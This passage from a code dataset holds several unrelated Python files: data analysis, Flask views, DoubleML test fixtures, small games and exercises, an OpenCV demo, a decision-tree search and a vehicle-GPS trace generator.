(i,j),k,d in zip(enumerate(map_visit),map_impr,dias) if j < 500 and j > 0 and k >= 1000 and d > 10]\n\ndl = [i for (i,j),k in zip(enumerate(list_visit),list_impr) if j < 200 and j > 0 and k >= 1000]\n\ndml = [i for i in dm if i in dl]\nimpr_ml = list_impr[dml]/map_impr[dml]\nvisit_ml = list_visit[dml]/(map_visit[dml])\n\n'''\n#precios = [(100,500),(500,1000),(1000,2000),(2000,4000),(4000,8000),(8000,16000),(16000,32000),(32000,64000),(64000,120000),(120000,240000),(240000,480000),(480000,1000000),(1000000,2000000),(2000000,np.inf)]\n#params = [(i,j,k) for i in range(1,4) for j in range(1,3) for k in range(len(precios))]\n\nparams = [(i,j) for i in range(1,4) for j in range(1,3)]\n\ncount = 0\nfor id_tipo, id_mod in params:\n    dtest = [i for i,item in enumerate(DATA.data.values()) if \n             item.data['id_tipo'] == id_tipo and\n             item.data['id_mod'] == id_mod and\n             item.data['map_impr'] > 1000 and\n             item.data['map_visit'] > 0 and\n             dias[i] > 10]\n    count += len(dtest)\n    if len(dtest) < 10:\n        continue\n\n\n    print(\"\\n(%d rows) id_tipo: %d, id_mod: %d\"%(len(dtest), id_tipo, id_mod))\n    for var,value in zip(vars,np.corrcoef(np.concatenate((DATA_X[dtest,:],DATA_ctr_map[dtest].reshape(len(dtest),-1)),axis = 1),rowvar=0)[14,:]):\n        print(\"%s: %f\"%(var, value))\n\n    #count += len(dtest)\nprint(count)\n\n'''\npl.ion()\npl.hist(impr_ml,100),pl.show()\npl.figure()\npl.hist(visit_ml,max(visit_ml)), pl.show()\n'''\n \n\n","sub_path":"GPI_env/gpi_destacados/CTR_data_analisys.py","file_name":"CTR_data_analisys.py","file_ext":"py","file_size_in_byte":7043,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"45"}
{"seq_id":"297774300","text":"# coding: utf-8\n\n__author__ = 
'Junki Ishida'\n\nfrom .base import BaseView\nfrom .exceptions import DefinitionError\nfrom ._compat import iteritems\n\nimport flask, json\n\ntry:\n import yaml\n\n try:\n from yaml import CSafeDumper as YAMLDumper\n except ImportError:\n from yaml import SafeDumper as YAMLDumper\nexcept ImportError:\n pass\n\ntry:\n import xmltodict\nexcept ImportError:\n pass\n\n\ndef _add_repr_func(funcs, method, media_type, func):\n if method in funcs:\n funcs[method][media_type] = func\n else:\n funcs[method] = {media_type: func}\n\n\ndef _update_repr_funcs(funcs, repr_funcs):\n for method, func_map in repr_funcs.items():\n for media_type, func in func_map.items():\n _add_repr_func(funcs, method, media_type, func)\n\n\nclass RepresentationViewBase(BaseView):\n # required\n repr_default_mimetype = None\n\n # optional\n repr_mimetype_map = None\n\n def init_class(cls):\n if cls.url_rule is not None and cls.repr_default_mimetype is None:\n raise DefinitionError(required_field=(cls.__name__, 'repr_default_mimetype',))\n __funcs = {}\n for base in cls.__bases__:\n if hasattr(base, '_repr_funcs'):\n _update_repr_funcs(__funcs, base._repr_funcs)\n if hasattr(cls, '_repr_funcs'):\n _update_repr_funcs(__funcs, cls._repr_funcs)\n if cls.repr_mimetype_map:\n for method, mimetype in cls.repr_mimetype_map.items():\n _add_repr_func(__funcs, method, mimetype, cls.represent_func)\n cls.repr_mimetype_map = None\n cls._repr_funcs = __funcs\n\n def before_dispatch(self, *args, **kwargs):\n method = flask.request.method\n if method in self._repr_funcs:\n self._repr_method = method\n elif method == 'HEAD' and 'GET' in self._repr_funcs:\n self._repr_method = 'GET'\n else:\n self._repr_method = None\n super(RepresentationViewBase, self).before_dispatch(*args, **kwargs)\n\n def find_mimetype(self):\n if self._repr_method:\n func_map = self._repr_funcs[self._repr_method]\n for mimetype, q in flask.request.accept_mimetypes:\n if mimetype in func_map:\n return mimetype\n return self.repr_default_mimetype\n return None\n\n\n def represent(self, response):\n if self._repr_method:\n func_map = self._repr_funcs[self._repr_method]\n return func_map[self._mimetype](response)\n return response\n\n @classmethod\n def represent_func(cls, response):\n raise NotImplementedError()\n\n\nclass JsonRepresentationView(RepresentationViewBase):\n repr_default_mimetype = 'application/json'\n repr_mimetype_map = {'GET': 'application/json', }\n\n @classmethod\n def represent_func(cls, response):\n return json.dumps(response)\n\n\nclass XmlRepresentationView(RepresentationViewBase):\n repr_default_mimetype = 'application/xml'\n repr_mimetype_map = {'GET': 'application/xml', }\n\n @classmethod\n def represent_func(cls, response):\n return xmltodict.unparse(response, encoding=cls.charset)\n\n\nclass YamlRepresentationView(RepresentationViewBase):\n repr_default_mimetype = 'application/x-yaml'\n repr_mimetype_map = {'GET': 'application/x-yaml', }\n\n @classmethod\n def represent_func(cls, response):\n return yaml.dump(response, Dumper=YAMLDumper)\n\n\n# jxybridge is required (https://github.com/gomi931/jxybridge)\nclass ModelRepresentationView(RepresentationViewBase):\n \"\"\"\n # either jxybridge_dumper or jxybridge_dumper_map is required\n # example:\n # # A dumper is used when receiving only GET requests.\n # jxybridge_dumper = Dumper(Model)\n # example:\n # # Dumpers can be specified for each http method.\n # jxybridge_dumper_map = {\n # 'GET': Dumper(Model),\n # 'PUT': Dumper(Model),\n # }\n \"\"\"\n jxybridge_dumper = None\n jxybridge_dumper_map 
= None\n\n # optional\n repr_default_mimetype = 'application/json'\n jxybridge_dump_func_association = {\n 'application/json': lambda d: lambda r: d.to_json(r),\n 'application/xml': lambda d: lambda r: d.to_xml(r, pretty_print=True),\n 'application/x-yaml': lambda d: lambda r: d.to_yaml(r),\n }\n\n def init_class(cls):\n if cls.url_rule is not None:\n if cls.jxybridge_dumper_map is None:\n if cls.jxybridge_dumper is None:\n raise DefinitionError(required_field=(cls.__name__, 'jxybridge_dumper_map'))\n cls.jxybridge_dumper_map = {'GET': cls.jxybridge_dumper, }\n __funcs = cls._repr_funcs\n for method, dumper in iteritems(cls.jxybridge_dumper_map):\n for media_type, getter in iteritems(cls.jxybridge_dump_func_association):\n _add_repr_func(__funcs, method, media_type, getter(dumper))\n cls._repr_funcs = __funcs\n\n\nclass TemplateRepresentationView(RepresentationViewBase):\n repr_template = None\n repr_default_mimetype = 'text/html'\n repr_mimetype_map = {\n 'GET': 'text/html',\n }\n\n def init_class(cls):\n if cls.url_rule is not None and cls.repr_template is None:\n raise DefinitionError(required_field=(cls.__name__, 'repr_template'))\n\n @classmethod\n def represent_func(cls, response):\n return flask.render_template(cls.repr_template, response)","sub_path":"flask_flab/representations.py","file_name":"representations.py","file_ext":"py","file_size_in_byte":5457,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"45"} +{"seq_id":"566253071","text":"import numpy as np\nimport pandas as pd\n\nimport pytest\nfrom scipy.linalg import toeplitz\n\nfrom sklearn.datasets import make_spd_matrix\nfrom sklearn.datasets import make_regression, make_classification\n\nfrom doubleml.datasets import make_plr_turrell2018, make_irm_data, make_iivm_data, make_pliv_CHS2015\n\n\ndef _g(x):\n return np.power(np.sin(x), 2)\n\n\ndef _m(x, nu=0., gamma=1.):\n return 0.5/np.pi*(np.sinh(gamma))/(np.cosh(gamma)-np.cos(x-nu))\n\n\ndef _m2(x):\n return np.power(x, 2)\n\n\n@pytest.fixture(scope='session',\n params=[(500, 10),\n (1000, 20),\n (1000, 100)])\ndef generate_data1(request):\n n_p = request.param\n np.random.seed(1111)\n # setting parameters\n n = n_p[0]\n p = n_p[1]\n theta = 0.5\n\n # generating data\n data = make_plr_turrell2018(n, p, theta, return_type=pd.DataFrame)\n\n return data\n\n\n@pytest.fixture(scope='session',\n params=[(500, 20)])\ndef generate_data2(request):\n n_p = request.param\n np.random.seed(1111)\n # setting parameters\n n = n_p[0]\n p = n_p[1]\n theta = 0.5\n\n # generating data\n data = make_plr_turrell2018(n, p, theta)\n\n return data\n\n\n@pytest.fixture(scope='session',\n params=[(1000, 20)])\ndef generate_data_bivariate(request):\n n_p = request.param\n np.random.seed(1111)\n # setting parameters\n n = n_p[0]\n p = n_p[1]\n theta = np.array([0.5, 0.9])\n b = [1/k for k in range(1, p+1)]\n sigma = make_spd_matrix(p)\n\n # generating data\n x = np.random.multivariate_normal(np.zeros(p), sigma, size=[n, ])\n G = _g(np.dot(x, b))\n M0 = _m(np.dot(x, b))\n M1 = _m2(np.dot(x, b))\n D0 = M0 + np.random.standard_normal(size=[n, ])\n D1 = M1 + np.random.standard_normal(size=[n, ])\n y = theta[0] * D0 + theta[1] * D1 + G + np.random.standard_normal(size=[n, ])\n d = np.column_stack((D0, D1))\n column_names = [f'X{i+1}' for i in np.arange(p)] + ['y'] + \\\n [f'd{i+1}' for i in np.arange(2)]\n data = pd.DataFrame(np.column_stack((x, y, d)),\n columns=column_names)\n\n return data\n\n\n@pytest.fixture(scope='session',\n params=[(1000, 20)])\ndef 
generate_data_toeplitz(request, betamax=4, decay=0.99, threshold=0, noisevar=10):\n n_p = request.param\n np.random.seed(3141)\n # setting parameters\n n = n_p[0]\n p = n_p[1]\n\n beta = np.array([betamax * np.power(j+1, -decay) for j in range(p)])\n beta[beta < threshold] = 0\n\n cols_treatment = [0, 4, 9]\n\n sigma = toeplitz([np.power(0.9, k) for k in range(p)])\n mu = np.zeros(p)\n\n # generating data\n x = np.random.multivariate_normal(mu, sigma, size=[n, ])\n y = np.dot(x, beta) + np.random.normal(loc=0.0, scale=np.sqrt(noisevar), size=[n, ])\n d = x[:, cols_treatment]\n x = np.delete(x, cols_treatment, axis=1)\n column_names = [f'X{i+1}' for i in np.arange(x.shape[1])] + \\\n ['y'] + [f'd{i+1}' for i in np.arange(len(cols_treatment))]\n data = pd.DataFrame(np.column_stack((x, y, d)),\n columns=column_names)\n\n return data\n\n\n@pytest.fixture(scope='session',\n params=[(1000, 20)])\ndef generate_data_iv(request):\n n_p = request.param\n np.random.seed(1111)\n # setting parameters\n n = n_p[0]\n p = n_p[1]\n theta = 0.5\n\n # generating data\n data = make_pliv_CHS2015(n_obs=n, dim_x=p, alpha=theta, dim_z=1, return_type=pd.DataFrame)\n\n return data\n\n\n@pytest.fixture(scope='session',\n params=[(500, 10),\n (1000, 20),\n (1000, 100)])\ndef generate_data_irm(request):\n n_p = request.param\n np.random.seed(1111)\n # setting parameters\n n = n_p[0]\n p = n_p[1]\n theta = 0.5\n\n # generating data\n data = make_irm_data(n, p, theta, return_type='array')\n\n return data\n\n\n@pytest.fixture(scope='session',\n params=[(500, 11)])\ndef generate_data_iivm(request):\n n_p = request.param\n np.random.seed(1111)\n # setting parameters\n n = n_p[0]\n p = n_p[1]\n theta = 0.5\n gamma_z = 0.4\n\n # generating data\n data = make_iivm_data(n, p, theta, gamma_z, return_type=pd.DataFrame)\n\n return data\n\n\n@pytest.fixture(scope='session',\n params=[500])\ndef generate_data_pliv_partialXZ(request):\n n_p = request.param\n np.random.seed(1111)\n # setting parameters\n n = n_p\n theta = 1.\n\n # generating data\n data = make_pliv_CHS2015(n, alpha=theta)\n\n return data\n\n\n@pytest.fixture(scope='session',\n params=[500])\ndef generate_data_pliv_partialX(request):\n n_p = request.param\n np.random.seed(1111)\n # setting parameters\n n = n_p\n theta = 1.\n\n # generating data\n data = make_pliv_CHS2015(n, alpha=theta, dim_z=5)\n\n return data\n\n\n@pytest.fixture(scope='session',\n params=[500])\ndef generate_data_pliv_partialZ(request):\n n_p = request.param\n np.random.seed(1111)\n # setting parameters\n n = n_p\n theta = 1.\n\n # generating data\n data = make_data_pliv_partialZ(n, alpha=theta, dim_x=5)\n\n return data\n\n\ndef make_data_pliv_partialZ(n_obs, alpha=1., dim_x=5, dim_z=150):\n xx = np.random.multivariate_normal(np.zeros(2),\n np.array([[1., 0.6], [0.6, 1.]]),\n size=[n_obs, ])\n epsilon = xx[:, 0]\n u = xx[:, 1]\n\n sigma = toeplitz([np.power(0.5, k) for k in range(1, dim_x + 1)])\n x = np.random.multivariate_normal(np.zeros(dim_x),\n sigma,\n size=[n_obs, ])\n\n I_z = np.eye(dim_z)\n xi = np.random.multivariate_normal(np.zeros(dim_z),\n 0.25*I_z,\n size=[n_obs, ])\n\n beta = [1 / (k**2) for k in range(1, dim_x + 1)]\n gamma = beta\n delta = [1 / (k**2) for k in range(1, dim_z + 1)]\n\n I_x = np.eye(dim_x)\n Pi = np.hstack((I_x, np.zeros((dim_x, dim_z-dim_x))))\n z = np.dot(x, Pi) + xi\n\n d = np.dot(x, gamma) + np.dot(z, delta) + u\n y = alpha * d + np.dot(x, beta) + epsilon\n\n x_cols = [f'X{i + 1}' for i in np.arange(dim_x)]\n z_cols = [f'Z{i + 1}' for i in np.arange(dim_z)]\n 
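# assemble the simulated dataset: covariates x, outcome y, treatment d, instruments z\n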
    data = pd.DataFrame(np.column_stack((x, y, d, z)),\n                        columns=x_cols + ['y', 'd'] + z_cols)\n\n    return data\n\n\n@pytest.fixture(scope='session',\n                params=[(253, 10, False), (501, 52, False),\n                        (253, 10, True), (501, 52, True)])\ndef generate_data_cv_predict(request):\n    np.random.seed(3141)\n    # setting parameters\n    n_p_c = request.param\n    n = n_p_c[0]\n    p = n_p_c[1]\n    classifier = n_p_c[2]\n\n    # generating data\n    if classifier:\n        x, y = make_classification(n_samples=n, n_features=p)\n    else:\n        x, y = make_regression(n_samples=n, n_features=p)\n    data = (x, y, classifier)\n\n    return data\n","sub_path":"doubleml/tests/conftest.py","file_name":"conftest.py","file_ext":"py","file_size_in_byte":6952,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"45"}
{"seq_id":"115543234","text":"rock_0 = '''\n    _______\n---'   ____)\n      (_____)\n      (_____)\n      (____)\n---.__(___)\nRock'''\n\npaper_1 = '''\n    _______\n---'   ____)____\n          ______)\n          _______)\n         _______)\n---.__________)\nPaper'''\n\nscissors_2 = '''\n    _______\n---'   ____)____\n          ______)\n       __________)\n      (____)\n---.__(___)\nScissors'''\n\n# Rock, Paper, Scissors Game\nimport random\nchoose = int(input(\"What do you choose? Type 0 for Rock, 1 for Paper, 2 for Scissors. \"))\n\n\nif choose >= 3 or choose < 0:\n    print(\"You entered an invalid number\")\nelse: \n    comp_random = random.randint(0,2)\n    my_list = [rock_0, paper_1, scissors_2]\n    print(my_list[int(choose)])\n    print(\"\")\n    print(\"Computer chose:\")\n    print(my_list[comp_random])\n\n    if choose == 0 and comp_random == 2:\n        print(\"you win\") \n    elif choose == 1 and comp_random == 0:\n        print(\"you win\")\n    elif choose == 2 and comp_random == 1:\n        print(\"you win\") \n    else:\n        print(\"you lose\") \n\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":965,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"45"}
{"seq_id":"459418232","text":"\"\"\"\nI thought DFS could always be replaced by BFS, but maybe not..?\n\n\"\"\"\nfrom collections import defaultdict, deque\nimport queue\n\n\nN, M = map(int, input().split())\n\ngraph = defaultdict(list)\nfor _ in range(M):\n    a, b = map(int, input().split())\n    # graph[a] = b\n    graph[a].append(b)\n\nfor n in range(1,N+1):\n    if graph[n] == []:\n        graph[n].append(n)\n\ncnt_dict = {x:0 for x in range(1,N+1)}\ndef parent(x):\n    if graph[x] == [x]:\n        cnt_dict[x] += 1\n        return [x]\n    else:\n        new_parent = []\n        for p in graph[x]:\n            new_parent.extend(parent(p))\n\n        graph[x] = new_parent\n        return new_parent\n\nfor n in range(1,N+1):\n    parent(n)\n\n# print(graph)\n# print(cnt_dict)\n\n# cnt_dict = {x:0 for x in range(1,N+1)}\n# def dfs(node):\n#     cnt_dict[node] += 1\n#     for adj in graph[node]:\n#         dfs(adj)\n\n# for n in range(1,N+1):\n#     dfs(n)\n\n\nmax_val = max(cnt_dict.values())\nanswer = [k for k,v in cnt_dict.items() if v == max_val]\nprint(' '.join(map(str, sorted(answer))))","sub_path":"bakjoon/효율적인해킹.py","file_name":"효율적인해킹.py","file_ext":"py","file_size_in_byte":1032,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"45"}
{"seq_id":"79842697","text":"class Nation:\n    import openpyxl\n    from openpyxl.utils import get_column_letter\n\n    WB = openpyxl.load_workbook(r\"C:\\Users\\smeg\\Desktop\\F1M001\\Data\\Countries.xlsx\")\n    WS = WB[\"List1\"]\n    HEADERS = {}\n    i = 1\n    for header in WS[1]:\n        HEADERS[header.value] = i\n        i+=1\n\n    COUNTRIES = {}\n    i = 0\n    for country in WS[get_column_letter(HEADERS['SHORT'])]:\n        COUNTRIES[country.value] = i\n        i+=1\n\n
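    # HEADERS maps column titles to 1-based column indices; COUNTRIES maps each\n    # country's SHORT code to its 0-based row offset in the worksheet\n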
    def __init__(self, nation):\n        assert nation in Nation.COUNTRIES.keys(), \"Sorry, wrong nation given\"\n\n        row = Nation.COUNTRIES[nation]\n\n        def cell(header):\n            # value of the cell in the given header's column for this nation's row\n            return Nation.WS[Nation.get_column_letter(Nation.HEADERS[header])][row].value\n\n        self.nameEng = cell(\"NAME\")\n        self.nameRus = [cell(h) for h in (\"RUS\", \"RUS_2\", \"RUS_3\", \"RUS_4\", \"RUS_5\", \"RUS_6\")]\n\n        self.nameEngAdj = cell(\"ADJECTIVE\")\n        self.nameRusAdj = [cell(h) for h in (\"RUS_ADJECTIVE_M\", \"RUS_ADJECTIVE_F\", \"RUS_ADJECTIVE_N\", \"RUS_ADJECTIVE_P\")]\n\n    def nameEnglish(self):\n        return self.nameEng\n\n    def nameRussian(self, index = 0):\n        return self.nameRus[index]\n\n    def adjEnglish(self):\n        return self.nameEngAdj\n\n    def adjRussian(self, gender = 'M', capital = False):\n        result = \"\"\n        if gender == 'M':\n            result = self.nameRusAdj[0]\n        elif gender == 'F':\n            result = self.nameRusAdj[1]\n        elif gender == 'N':\n            result = self.nameRusAdj[2]\n        elif gender == 'P':\n            result = self.nameRusAdj[3]\n        else:\n            raise ValueError('Wrong gender lexeme passed!')\n        if capital: result = result.capitalize()\n\n        return result\n\nclass Driver:\n    def __init__(self, name, surname, gender, birthdate, nation):\n        self.name = name\n        self.surname = surname\n        self.gender = gender\n        self.birthdate = birthdate\n        self.nation = nation\n\nclass Bolid:\n    def __init__(self, teamName, motorName, sponsorName, nation):\n        self.teamName = teamName\n        self.motorName = motorName\n        self.sponsorName = sponsorName\n        self.nation = nation\n\nclass RaceUnit:\n    def __init__(self, number, team, driver):\n        self.number = number\n        self.team = team\n        self.driver = driver\n\nnat1 = Nation('RUS')\nprint(nat1.nameEnglish())\nprint(nat1.nameRussian(3))\nprint(nat1.adjEnglish())\nprint(nat1.adjRussian('M', True))\n\n\n\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3517,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"45"}
{"seq_id":"6473021","text":"import cv2\nimport numpy as np\n\nimg = cv2.imread('./110-150.jpg')\n\nimgResize = cv2.resize(img,(1000,500))\nimgCropped = img[:200,100:300]\n
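# NumPy slicing is [rows, cols]: this keeps rows 0-199 and columns 100-299\n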
\n\nprint(img.shape)\nprint(imgResize.shape)\nprint(imgCropped.shape)\n\nimg2 = np.zeros((512,512,3),np.uint8) # 0~255\nimg2[:] = 255,0,0 # fill the whole image with blue (OpenCV uses BGR order)\ncv2.line(img,(0,0),(img.shape[1],img.shape[0]),(0,255,0),3)\ncv2.rectangle(img, (0,0), (250,100),(0,0,255),cv2.FILLED)\n# org is the bottom-left corner of the text; y=0 would place it above the visible area\ncv2.putText(img, \"OPENCV\", (100,50),cv2.FONT_HERSHEY_COMPLEX,1,(0,150,0),1)\n\n\ncv2.imshow('Image',img)\n\n\ncv2.waitKey(0)","sub_path":"nlp_pytorch/opencv.py","file_name":"opencv.py","file_ext":"py","file_size_in_byte":540,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"45"}
{"seq_id":"293926297","text":"import cx_Freeze\nimport sys\nimport matplotlib\n\nbase = None\n\nif sys.platform == 'win32':\n    base = \"Win32GUI\"\n\nexecutables = [cx_Freeze.Executable('BitCoins.py', base=base, icon='btc.ico')]\n\ncx_Freeze.setup(\n    name=\"Bit Coin The app\",\n    options={\"build_exe\": {\"packages\": [\"tkinter\",\"matplotlib\"], \"include_files\": [\"btc.ico\"]}},\n    version=\"0.01\",\n    description=\"The Bit Coin App\",\n    executables=executables\n    )\n\n","sub_path":"JobCard/project/kinter/setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":426,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"42"}
{"seq_id":"316859261","text":"import random\nimport numpy as np\nimport pandas as pd\nimport joblib\nimport matplotlib.pyplot as plt\nfrom sklearn.pipeline import Pipeline\nfrom sklearn.tree import export_graphviz\nfrom sklearn.tree import DecisionTreeClassifier\nfrom sklearn.ensemble import RandomForestClassifier\nfrom sklearn.ensemble import VotingClassifier\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.model_selection import cross_val_score\nfrom sklearn.model_selection import GridSearchCV\n\nglass = pd.read_csv(\"glass.csv\")\n\n# Split labels\ntrain_, test_ = train_test_split(glass, test_size = 0.15, random_state = 42)\ntrain_labels = train_[\"Type\"]\ntrain_ = train_.drop(columns = [\"Type\"])\ntest_labels = test_[\"Type\"]\ntest_ = test_.drop(columns = [\"Type\"])\ntrain = train_\n\nnewModel = True\nfor i in range(1000):\n\n    if newModel:\n        currPredictOld = joblib.load('dtc.pkl')\n        newModel = False\n    count = 0\n    tree_predict = currPredictOld.predict(test_)\n    # use j here so the outer iteration counter i is not shadowed\n    for j, prediction in enumerate(tree_predict):\n        if prediction == test_labels.iloc[j]:\n            count += 1\n        pass\n    OldAccuracy = count / len(test_)\n\n    # # pg.175\n    param_grid = [\n        {'max_depth':[1,3,5,7,9,11,13,15,17], 'criterion': ['gini', 'entropy'], 'splitter': ['best', 'random']}\n    ]\n\n    tree_clf = DecisionTreeClassifier()\n    grid_search = GridSearchCV(tree_clf, param_grid, cv = 5, return_train_score=True, n_jobs=-1, iid = True)\n    grid_search.fit(train, train_labels)\n    # print(grid_search.best_params_)\n    # print(grid_search.best_score_)\n    currPredict = grid_search.best_estimator_\n\n    count = 0\n    tree_predict = currPredict.predict(test_)\n    for j, prediction in enumerate(tree_predict):\n        if prediction == test_labels.iloc[j]:\n            count += 1\n        pass\n    NewAccuracy = count / len(test_)\n\n    if(NewAccuracy > OldAccuracy):\n        newModel = True\n        print(i)\n        print(\"Old:\", OldAccuracy)\n        print(\"New:\", NewAccuracy)\n        print(\"Saving new model...\")\n        print('\\n')\n        export_graphviz(\n            currPredict,\n            out_file = 'glass_tree.dot',\n            feature_names = glass.columns[:9]\n        )\n\n        joblib.dump(currPredict, \"dtc.pkl\")\n","sub_path":"rf.py","file_name":"rf.py","file_ext":"py","file_size_in_byte":2211,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"42"}
{"seq_id":"236615182","text":"import pymysql.cursors\nimport random\nimport numpy\n\n\ndef strtonum(s):\n    # parse a hexadecimal string into an integer\n    return int(s, 16)\n\n\ndef getx(longitude):\n    return strtonum(longitude) - baselongitude\n\n\ndef gety(latitude):\n    return strtonum(latitude) - baselatitude\n\n\ndef get_time(timestamp):\n
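    # offset in seconds from basetimestamp, the start of the queried time window\n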
    return strtonum(timestamp) - basetimestamp\n\n# print(str(get_time('5645c708')))\n\n'''\ninit node\n$node_(0) set X_ 150.0\n$node_(0) set Y_ 595.05\n$node_(0) set Z_ 0\n'''\n# def writeinitnode(id, x, y):\n#     try:\n#         tclfile = open(\"trace.csv\",\"a\")\n#         tclfile.writelines(str(x) + \" \" + str(y) + \"\\n\")\n#     finally:\n#         if tclfile:\n#             tclfile.close()\n\n\n'''\nafter init node, node trace\n$ns_ at 0.0 \"$node_(0) setdest 150.0 595.05 19.96\"\n'''\n\n\ndef writenodetrace(id, x, y, time):\n    # a context manager closes the file even if the write fails\n    with open(\"bj_pm_trace.txt\", \"a\") as tclfile:\n        tclfile.writelines(str(time)+\",\"+str(id)+\",\"+str(x)+\",\"+str(y)+\"\\n\")\n\n\ndef write_gps(latitude, longitude):\n    with open(\"bj_pm_gps.txt\", \"a\") as gps_file:\n        gps_file.writelines(str(latitude) + \",\" + str(longitude) + \"\\n\")\n\n# timeStamp\n# 0\n# 2015-11-13 08:30:00 ----> 2015-11-13 08:35:00\n# 56452f08 -------> 56453034\n# 1447374600\n# 1\n# 2015-11-13 09:00:00 ----> 2015-11-13 09:05:00\n# 56453610 -------> 5645373c\n# 1447376400\n# 2\n# 2015-11-13 22:30:00 ----> 2015-11-13 22:35:00\n# 5645f3e8 -------> 5645f514\n# 1447425000\n# SQL query conditions\n# Map setup\n# 1 3*3km\n# latitude 3d05ff longitude b191bb\n# 2 5*5km\n# latitude 3d0dcf longitude b1998b\n\n'''\nLocation AreaSize Time VehicleNumber\nBeijing 3*3 9AM 252\nBeijing 3*3 10PM 193\nBeijing 5*5 9AM 377\nBeijing 5*5 10PM 284\nChengdu 3*3 9AM\nChengdu 3*3 10PM\n'''\n\nbaselatitude = 3996231\nbaselongitude = 11634179\nbasetimestamp = 1447429740\n# the decimal bases above equal the hex lower bounds used in tablecondition below\n# (e.g. int('3cfa47', 16) == 3996231), so getx/gety/get_time yield offsets from the\n# query window's origin\n\n\ntablecondition = \"WHERE `timeStamp`>='5646066c' AND `timeStamp`<='56460810' \" \\\n                 \"AND latitude>='3cfa47' AND latitude<='3d05ff'\" \\\n                 \"AND longitude>='b18603'AND longitude<='b191bb'\"\n\n\ndef sqlcreattem():\n    sql_creat_tem_table = \"CREATE TEMPORARY TABLE tem_table SELECT * FROM vehicleGPS \" + tablecondition\n    cursor.execute(sql_creat_tem_table)\n    print(\"create tem table success\")\n    return\n\n\ncondition = \" GROUP BY VehicleID\"\n\n\ndef sqlcount():\n    sql_query_vehicle_id = \"SELECT VehicleID, COUNT(*) FROM tem_table \" + condition\n    cursor.execute(sql_query_vehicle_id)\n    return cursor.fetchall()\n\n\ndef getvehicleid():\n    vehicleid = []\n    total = 0\n    points = sqlcount()\n    print(\"query timelength success\")\n    for point in points:\n        total += point[1]\n    print(\"Vehicle count is \"+str(len(points)))\n    avg = total / len(points)\n    print(\"AVG is \"+str(avg))\n    i = 0\n    num = 3\n    for point in points:\n        #print(point[1])\n        if point[1] >= num: # value = 24\n            i += 1\n            vehicleid.append(point[0])\n    print(\"Number with at least \" + str(num) + \" points is \"+str(i))\n    return vehicleid\n\n\ndef get_all_vehicle_id():\n    vehicle_id = []\n    points = sqlcount()\n    for point in points:\n        vehicle_id.append(point[0])\n    return vehicle_id\n\n\ndef sqlinfo(id):\n    sql_query_vehicle_info = \"SELECT * FROM tem_table \" + \"WHERE VehicleID=\" + \"\\'\" + id + \"\\'\"\n    cursor.execute(sql_query_vehicle_info)\n    return cursor.fetchall()\n\n\ndef get_origin_vehicle_number_in_seconds():\n    seconds_vehicle_number = {}\n    seconds_number = numpy.zeros(300)\n    vehicle_id = get_all_vehicle_id()\n    for id in vehicle_id:\n        infos = sqlinfo(str(id))\n        for info in infos:\n            # print(str(info))\n            time = int(get_time(info[2]))\n            seconds_number[time] += 1\n    for i in range(300):\n        if seconds_number[i] > 0:\n            index = str(i)\n            seconds_vehicle_number[index] = seconds_number[i]\n    return seconds_vehicle_number\n\n\ndef get_process_vehicle_number_in_seconds():\n    seconds_vehicle_number = {}\n    seconds_number = numpy.zeros(300)\n
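    # consider only vehicles with enough GPS points (see getvehicleid above)\n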
    vehicle_id = getvehicleid()\n    for id in vehicle_id:\n        infos = sqlinfo(str(id))\n        for info in infos:\n            # print(str(info))\n            x = getx(info[4])\n            y = gety(info[3])\n            time = int(get_time(info[2]))\n            if time == 0:\n                # transform x, y into longitude and latitude\n                longitude = (x + baselongitude) / 100000\n                latitude = (y + baselatitude) / 100000\n                write_gps(latitude=latitude, longitude=longitude)\n            seconds_number[time] += 1\n    for i in range(300):\n        if seconds_number[i] > 0:\n            index = str(i)\n            seconds_vehicle_number[index] = seconds_number[i]\n    return seconds_vehicle_number\n\n\ndef get_vehicle_info():\n    base_id = 1\n    vehicle_id = getvehicleid()\n    process_vehicle_number = {}\n    vehicle_number = numpy.zeros(301)\n    end_vehicle_number = 0\n    begin_vehicle_number = 0\n    for id in vehicle_id:\n        infos = sqlinfo(str(id))\n        last_time = 0\n        last_x = 0\n        last_y = 0\n        info_number = 0\n        for info in infos:\n            info_number += 1\n            print(str(info))\n            x = getx(info[4])\n            y = gety(info[3])\n            time = int(get_time(info[2])) + 1\n            if info_number == 1:\n                if time <= 60:\n                    begin_vehicle_number += 1\n                    for j in range(time):\n                        # writenodetrace(base_id, x, y, j + 1)\n                        vehicle_number[j] += 1\n                    longitude = (x + baselongitude) / 100000\n                    latitude = (y + baselatitude) / 100000\n                    write_gps(latitude=latitude, longitude=longitude)\n                else:\n                    if (time - 60) >= 1:\n                        writenodetrace(base_id, x, y, time-60)\n                    if time <= 90:\n                        longitude = (x + baselongitude) / 100000\n                        latitude = (y + baselatitude) / 100000\n                        write_gps(latitude=latitude, longitude=longitude)\n                last_time = time\n                last_x = x\n                last_y = y\n            else:\n                time_different = time - last_time\n                if time_different >= 1:\n                    add_x = (x - last_x) / time_different\n                    add_y = (y - last_y) / time_different\n                    n = 1\n                    while n <= time_different:\n                        new_x = int(last_x + (add_x * n))\n                        new_y = int(last_y + (add_y * n))\n                        new_time = int(last_time + n)\n                        if new_time <= 360:\n                            if (new_time - 60) >= 1:\n                                writenodetrace(base_id, new_x, new_y, new_time-60)\n                                vehicle_number[new_time-60] += 1\n                        n += 1\n                    last_time = time\n                    last_x = x\n                    last_y = y\n        # process last info\n        last_info = infos[-1]\n        x = getx(last_info[4])\n        y = gety(last_info[3])\n        time = int(get_time(last_info[2])) + 1\n        if time >= 360:\n            if time < 420:\n                end_vehicle_number += 1\n                # note: range(time+1, 301) is empty when time >= 360, so this loop never runs\n                for end_time in range(time+1, 